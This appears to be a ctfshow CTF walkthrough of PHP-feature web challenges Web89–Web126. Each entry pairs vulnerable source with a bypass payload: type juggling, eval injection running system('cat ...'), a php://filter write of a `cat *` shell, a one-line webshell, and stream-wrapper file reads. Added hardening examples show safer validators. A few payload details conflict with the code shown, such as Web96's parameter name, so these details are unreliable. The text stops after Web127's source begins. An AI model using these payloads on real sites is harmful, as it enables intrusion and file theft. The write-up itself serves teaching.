ctfshow Web Basics: PHP Features
Web89
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 15:38:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}
preg_match() cannot handle arrays, so passing num as an array gets past the digit check.
payload: ?num[]=1
Web90
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:06:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}
intval() discards the letters.
payload1: ?num=4476x
intval($num,0) returns $num as a decimal integer, so if we pass 4476 written in hexadecimal it is converted to decimal.
payload: ?num=0x117c
Web91
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:16:09
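# @link: https://ctfer.com
*/
show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
}
First check: the value must start with php and end with php.
/i: case-insensitive
/m: multi-line matching
If %0aphp is used to insert a line break,
the first (multi-line) match finds php, while the second, which has no multi-line flag, matches nothing.
Web92
Source:
<?php
/*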
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:29:30
# @link: https://ctfer.com
*/
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}
Pass the hexadecimal value 0x117c.
Web93
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:32:58
# @link: https://ctfer.com
*/
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}
Letters are filtered, so hexadecimal cannot be used.
0bsss: binary, 0sss: octal, 0xsss: hexadecimal
The prefix usable in this challenge is 0, i.e. octal.
Convert 4476 to octal.
payload: ?num=010574
Or use a decimal point: 4476.123
Web94
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:46:19
# @link: https://ctfer.com
*/
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}
strpos() is used to filter a leading 0, so octal cannot be used.
A decimal point can be used: 4476.0
When intval() meets a decimal point, the value becomes an int.
Web95
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 16:53:59
# @link: https://ctfer.com
*/
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}
The . is filtered.
+010574 is treated as 010574, and because the first character is not 0 the condition is satisfied.
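The bypasses in Web89 to Web95 all come from letting intval() and a partial regex decide what counts as the number 4476, and Web91 from `$` not being a true end-of-input anchor. The following is an added example, not part of the original challenges (parse_id() and the sample list are illustrative names): a validator that accepts only a canonical decimal string, printed next to what intval() makes of the inputs used above.

```php
<?php
/**
 * Hypothetical helper (not from the challenges): accept only a canonical,
 * unsigned decimal string. Returns the integer, or null to reject.
 */
function parse_id($raw): ?int
{
    // num[]=1 arrives as an array; never hand it to string functions.
    if (!is_string($raw)) {
        return null;
    }
    // \A and \z anchor to the real start and end of the input. Unlike ^ and $
    // they ignore the m flag and do not tolerate a trailing newline.
    // No sign, no leading zero, no base prefix, no dot, no whitespace; the
    // length cap keeps the value inside a 32-bit int.
    if (preg_match('/\A[1-9][0-9]{0,8}\z/', $raw) !== 1) {
        return null;
    }
    return (int) $raw;
}

// Inputs taken from the write-ups above, plus the plain value.
$samples = [
    ['1'],        // Web89: array
    '4476x',      // Web90
    '0x117c',     // Web90, Web92
    '010574',     // Web93
    '4476.0',     // Web94
    '+010574',    // Web95
    "4476\n",     // trailing newline (the Web91 anchor issue)
    '4476',
];

foreach ($samples as $s) {
    $shown  = is_array($s) ? 'array' : json_encode($s);
    // The base argument only applies to strings, so arrays get plain intval().
    $loose  = is_array($s) ? intval($s) : intval($s, 0);
    $strict = parse_id($s);
    printf("%-12s intval=%-6d parse_id=%s\n", $shown, $loose, var_export($strict, true));
}
```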
Web96
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 19:21:24
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }
}
payload: c=./flag.php
Web97
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 19:36:32
# @link: https://ctfer.com
*/
include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
    if ($_POST['a'] != $_POST['b'])
        if (md5($_POST['a']) === md5($_POST['b']))
            echo $flag;
        else
            print 'Wrong.';
}
?>
md5 weak typing is enough here.
payload: a[]=1&b[]=2
Web98
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 21:39:27
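# @link: https://ctfer.com
*/
include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
?>
This challenge tests the ternary operator.
If there is a GET request, $_GET is switched to $_POST.
If the GET parameter flag equals flag, $_GET is switched to $_COOKIE.
If the GET parameter flag equals flag, $_GET is switched to $_SERVER.
If the GET parameter HTTP_FLAG equals flag, the flag is read.
The key lines are the first and the fourth: send a GET parameter flag with any value, then POST HTTP_FLAG=flag.
That satisfies the condition.
Web99
Source:
<?php
/*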
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-18 22:36:12
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) {
    array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}
?>
$allow = array(); defines an array
The loop adds values to the array
isset($_GET['n']) && in_array($_GET['n'], $allow): n exists and is in the $allow array
file_put_contents($_GET['n'], $_POST['content']); writes the file
POST a one-line webshell as the content.
in_array() is vulnerable here: the third parameter is not set, so the value is converted by default, to 33.
Connect with AntSword to get the flag.
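Web99 works because in_array() compares loosely unless its third argument is true, and because the request value is then reused as the file name. The following is an added example, not the challenge's code (slot_file() and the sample values are illustrative): it prints the loose and strict results side by side and builds the file name from the validated integer instead of the input. PHP 8.0 changed how a number is compared with a non-numeric string, so the loose column depends on the PHP version.

```php
<?php
// Constructed allow-list of integers, as in the challenge.
$allow = [1, 7, 36, 877];

/**
 * Hypothetical hardened check (not from the challenge): the value must be a
 * short decimal string whose integer form is in the list, compared strictly.
 * Returns a server-chosen file name, or null.
 */
function slot_file($n, array $allow): ?string
{
    if (!is_string($n) || !ctype_digit($n) || strlen($n) > 9) {
        return null;                       // "1.php", "36abc", arrays: rejected
    }
    $id = (int) $n;                        // normalise the type first ...
    if (!in_array($id, $allow, true)) {    // ... then compare with ===
        return null;
    }
    // The name is built from the integer, never from the raw input,
    // so the caller cannot choose an extension or a path.
    return sprintf('slot-%d.txt', $id);
}

foreach (['1', '1.php', '36', '36abc', '5'] as $n) {
    printf(
        "%-8s loose=%-5s strict=%-5s file=%s\n",
        json_encode($n),
        var_export(in_array($n, $allow), true),
        // Strict mode on the raw string never equals an int, which is why
        // slot_file() converts the validated string before the lookup.
        var_export(in_array($n, $allow, true), true),
        var_export(slot_file($n, $allow), true)
    );
}
```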
Web100
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-21 22:10:28
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
}
?>
Note: $v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
Because = has higher precedence than and, $v0 is true as long as v1 is numeric, which gets past the first if check.
payload: v1=2&v2=echo&v3=;system('tac ctfshow.php');
0x2d converts to -
flag:ctfshow{8605e17f-7bb6-4e48-b604-4c213947dbdc}
Web101
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-22 00:26:48
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/", $v2)){
        if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
}
?>
Special characters are filtered, so getting a shell is not possible.
Use the reflection class to print the class out.
payload: ?v1=2&v2=echo new ReflectionClass&v3=;
Flag obtained: b15c2f610x2d49090x2d42b00x2d97e50x2dc00dfea37e1
Converting 0x2d to -: b15c2f61-4909-42b0-97e5-c00dfea37e1
Submitting this flag fails…
The correct flag has 37 characters; ours has 36.
One character is missing, so guess it one by one.
Correct flag: b15c2f61-4909-42b0-97e5-c00dfea37e17
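Web100 and Web101 hinge on `=` binding tighter than `and`, so only is_numeric($v1) is ever stored in $v0. The following is an added example, not the challenge's code (the function names and inputs are illustrative), showing the check as written next to a version that combines all three results.

```php
<?php
// As written in the challenge: PHP parses this as
// ($v0 = is_numeric($v1)) and is_numeric($v2) and is_numeric($v3);
function check_as_written($v1, $v2, $v3): bool
{
    $v0 = is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
    return $v0;
}

// Fixed (illustrative): && binds tighter than =, so the three results are
// combined before the assignment. Parentheses around the "and" chain
// would have the same effect.
function check_fixed($v1, $v2, $v3): bool
{
    $v0 = is_numeric($v1) && is_numeric($v2) && is_numeric($v3);
    return $v0;
}

// Constructed inputs: all numeric, only the first numeric, first not numeric.
$rows = [
    ['2', '3', '4'],
    ['2', 'echo', ';'],
    ['x', '3', '4'],
];
foreach ($rows as [$a, $b, $c]) {
    printf(
        "%-18s as_written=%-5s fixed=%s\n",
        json_encode([$a, $b, $c]),
        var_export(check_as_written($a, $b, $c), true),
        var_export(check_fixed($a, $b, $c), true)
    );
}
```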
Web102
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-23 20:59:43
*/
highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    file_put_contents($v3,$str);
}
else{
    die('hacker');
}
?>
call_user_func(): passes the given arguments on to the callback function
file_put_contents(): writes to a file; PHP stream wrappers (pseudo-protocols) can be used
v2 must be numeric; v3 need not be, and neither does v1.
Pass hexadecimal in v2: 115044383959474e6864434171594473; the first two characters are there to get past substr().
5044383959474e6864434171594473 decodes to: PD89YGNhdCAqYDs
PD89YGNhdCAqYDs base64-decodes to: <?=`cat *`;
v2=115044383959474e6864434171594473
v1=hex2bin performs the hexadecimal conversion
v3=php://filter/write=convert.base64-decode/resource=qqq.php
The wrapper writes the base64 produced by the hex conversion into 1.php, where it is parsed and executed.
Then visit qqq.php and view the page source to get the flag.
Web103
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-23 21:03:24
*/
highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    if(!preg_match("/.*p.*h.*p.*/i",$str)){
        file_put_contents($v3,$str);
    }
    else{
        die('Sorry');
    }
}
else{
    die('hacker');
}
?>
$str is filtered, but that does no harm.
Same method as Web102.
Web104 (flawed hash comparison)
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 22:27:20
*/
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2)){
        echo $flag;
    }
}
?>
Same approach as for md5: neither function can handle arrays; alternatively, use values whose hashes start with 0e.
Web105 (variable overwrite)
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 22:34:07
*/
highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);
?>
First foreach: the name of a GET variable must not be error.
Second foreach: the value of a POST variable must not be flag.
The if check: if the submitted flag does not equal the variable $flag, $error is printed.
Via GET, pass suces=flag,
which completes the variable overwrite before the second foreach.
Via POST, pass error=suces.
This passes both foreach loops and the check, and gives the flag.
Web106 (flawed hash comparison)
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 22:38:27
*/
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2) && $v1!=$v2){
        echo $flag;
    }
}
?>
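Web97, Web104 and Web106 hash request values that may be arrays, and Web104 and Web106 compare the digests with `==`. The following is an added example, not the challenge's code (same_secret() and all sample values are illustrative): a comparison that rejects non-strings and compares digests as byte strings. The two 0e... strings are constructed stand-ins for digests that happen to look like numbers in scientific notation.

```php
<?php
/**
 * Hypothetical hardened comparison (not from the challenges): the supplied
 * value must be a string, and digests are compared with hash_equals(),
 * never with ==. Hashing both sides first gives equal-length inputs.
 */
function same_secret($given, string $expected): bool
{
    if (!is_string($given)) {
        return false;                 // a[]=1 style arrays stop here
    }
    return hash_equals(hash('sha256', $expected), hash('sha256', $given));
}

// Constructed digest-shaped strings: different text, both read as 0 x 10^n.
$d1 = '0e11111111111111111111111111111111';
$d2 = '0e22222222222222222222222222222222';

printf("loose  ==   : %s\n", var_export($d1 == $d2, true));
printf("strict ===  : %s\n", var_export($d1 === $d2, true));
printf("hash_equals : %s\n", var_export(hash_equals($d1, $d2), true));

// Constructed candidates checked against a constructed secret.
foreach ([['1'], 'wrong', 'correct horse'] as $candidate) {
    printf(
        "%-16s same_secret=%s\n",
        is_array($candidate) ? 'array' : json_encode($candidate),
        var_export(same_secret($candidate, 'correct horse'), true)
    );
}
```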
Web107
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 23:24:14
*/
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
    parse_str($v1,$v2);
    if($v2['flag']==md5($v3)){
        echo $flag;
    }
}
?>
parse_str(): parses a string into an array
First parameter: the string; second parameter: the array name
md5() cannot hash an array; the result is null.
So it is enough to pass flag= with an empty value.
Web108
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-28 23:53:55
*/
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE) {
    die('error');
}
// only people from 36d can see the flag
if(intval(strrev($_GET['c']))==0x36d){
    echo $flag;
}
?>
error
ereg(): matches against the given pattern
strrev(): reverses the string
ereg() has a NULL-byte truncation vulnerability; %00 can be used to bypass it.
0x36d is 877 in decimal; reversed it is 778.
payload: ?c=a%00778
Web109
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-29 22:02:34
*/
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){
        eval("echo new $v1($v2());");
    }
}
?>
Exception class and reflection class
payload: ?v1=ReflectionClass&v2=system('cat fl36dg.txt') or Exception
?v1=Exception&v2=system('ls')
Web110
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-29 22:49:10
*/
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v1)){
        die("error v1");
    }
    if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v2)){
        die("error v2");
    }
    eval("echo new $v1($v2());");
}
?>
Use built-in functions to get at the file.
FilesystemIterator(): its default string conversion outputs the first file in the directory
getcwd(): returns the current directory
payload: ?v1=FilesystemIterator&v2=getcwd
This reveals the flag file; because it sits in the web directory, visiting it directly gives the flag.
Web111
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-30 02:41:40
*/
highlight_file(__FILE__);
error_reporting(0);
include("flag.php");
function getFlag(&$v1,&$v2){
    eval("$$v1 = &$$v2;");
    var_dump($$v1);
}
if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];
    if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v1)){
        die("error v1");
    }
    if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v2)){
        die("error v2");
    }
    if(preg_match('/ctfshow/', $v1)){
        getFlag($v1,$v2);
    }
}
?>
This tests the PHP superglobal $GLOBALS.
$GLOBALS: references all variables available in the global scope
Example:
Both defined variables are printed.
Setting v1 to ctfshow satisfies these two checks.
Then setting v2 to GLOBALS satisfies its check.
With all conditions met, getFlag runs, assigns the value of v2 to v1, and dumps every variable with its contents.
payload: ?v1=ctfshow&v2=GLOBALS
Web112
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-30 23:47:49
*/
highlight_file(__FILE__);
error_reporting(0);
function filter($file){
    if(preg_match('/\.\.\/|http|https|data|input|rot13|base64|string/i',$file)){
        die("hacker!");
    }else{
        return $file;
    }
}
$file=$_GET['file'];
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
}
is_file(): checks whether the path is a regular file
Use a PHP stream wrapper (pseudo-protocol).
payload: ?file=php://filter/resource=flag.php
Web113
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-30 23:47:52
*/
highlight_file(__FILE__);
error_reporting(0);
function filter($file){
    if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
        die('hacker!');
    }else{
        return $file;
    }
}
$file=$_GET['file'];
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
}
filter is blocked, so the php:// wrapper can no longer be used.
Use the zlib:// wrapper instead.
payload: ?file=compress.zlib://flag.php
Web114
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-01 15:02:53
*/
error_reporting(0);
highlight_file(__FILE__);
function filter($file){
    if(preg_match('/compress|root|zip|convert|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
        die('hacker!');
    }else{
        return $file;
    }
}
$file=$_GET['file'];
echo "师傅们居然tql都是非预期 哼!";
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
}
filter is not blocked, so use the php:// wrapper.
payload: php://filter/resource=flag.php
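Web96 and Web112 to Web114 compare or deny-list the raw string while highlight_file() resolves it as a path or a stream wrapper. The following is an added example, not the challenge's code (resolve_viewable(), the sandbox directory and the allow-list are illustrative): the request value is canonicalised with realpath() and only allow-listed files inside the base directory are served.

```php
<?php
/**
 * Hypothetical resolver (not from the challenges): map a request value to a
 * file directly under $baseDir, or return null. Only names on $allowed pass.
 */
function resolve_viewable(string $baseDir, $requested, array $allowed): ?string
{
    if (!is_string($requested) || $requested === '') {
        return null;
    }
    // Stream wrappers (php://, compress.zlib://, ...) are not paths.
    if (strpos($requested, '://') !== false || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // Compare canonical paths: ./flag.php and a/../flag.php resolve to the
    // same file as flag.php, and nothing outside $base is reachable.
    if (dirname($path) !== $base) {
        return null;
    }
    return in_array(basename($path), $allowed, true) ? $path : null;
}

// Constructed sandbox so the example runs anywhere.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'viewer_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/index.php", "<?php // public\n");
file_put_contents("$dir/flag.php", "<?php // secret\n");

$inputs = [
    'index.php',
    'flag.php',
    './flag.php',                         // Web96
    'php://filter/resource=flag.php',     // Web112, Web114
    'compress.zlib://flag.php',           // Web113
    ['index.php'],                        // array instead of string
];
foreach ($inputs as $in) {
    $out = resolve_viewable($dir, $in, ['index.php']);
    printf(
        "%-34s => %s\n",
        is_array($in) ? 'array' : $in,
        $out === null ? 'rejected' : basename($out)
    );
}

// Clean up the sandbox.
unlink("$dir/index.php");
unlink("$dir/flag.php");
rmdir($dir);
```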
Web115
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-01 15:08:19
*/
include('flag.php');
highlight_file(__FILE__);
error_reporting(0);
function filter($num){
    $num=str_replace("0x","1",$num);
    $num=str_replace("0","1",$num);
    $num=str_replace(".","1",$num);
    $num=str_replace("e","1",$num);
    $num=str_replace("+","1",$num);
    return $num;
}
$num=$_GET['num'];
if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){
    if($num=='36'){
        echo $flag;
    }else{
        echo "hacker!!";
    }
}else{
    echo "hacker!!!";
}
hacker!!!
trim(): removes whitespace from both ends of the value
is_numeric(): a value with whitespace in front of it is still considered numeric
trim() strips \n \r \t \v \0 but does not strip \f.
URL-encode \f as %0c.
payload: %0c36
Web123
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
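if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&$c<=18){
        eval("$c".";");
        if($fl0g==="flag_give_me"){
            echo $flag;
        }
    }
}
?>
PHP variable names may contain only digits, letters and underscores; a space, +, [ or . is automatically replaced with _.
However, only one place in a variable name gets replaced.
So write CTF_SHOW.COM as CTF[SHOW.COM.
The [ is then replaced with _ while the . is left unchanged.
Once the second check is passed, the code is run through eval, so fun can simply be set to echo $flag.
This gives the flag.
Web125
Source:
<?php
/*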
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
#
#
*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print/i", $c)&&$c<=16){
        eval("$c".";");
        if($fl0g==="flag_give_me"){
            echo $flag;
        }
    }
}
?>
echo is filtered, so the flag can no longer be printed directly.
Instead, overwrite fl0g so that it satisfies the condition.
extract($_POST) performs the overwrite from the POST data.
Web126
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-07 22:02:47
#
#
*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print/i", $c)&&$c<=16){
        eval("$c".";");
        if($fl0g==="flag_give_me"){
            echo $flag;
        }
    }
}
?>
Because of $_SERVER, an assignment statement can be passed in the GET query string and then executed from the POST data.
get: ?$fl0g=flag_give_me;
post: CTF_SHOW=1&CTF[SHOW.COM=1&fun=eval($a[0])
Web127
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-10 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-10 21:52:49
*/
error_reporting(0);
include("flag.php");
highlight_file(__FILE__);
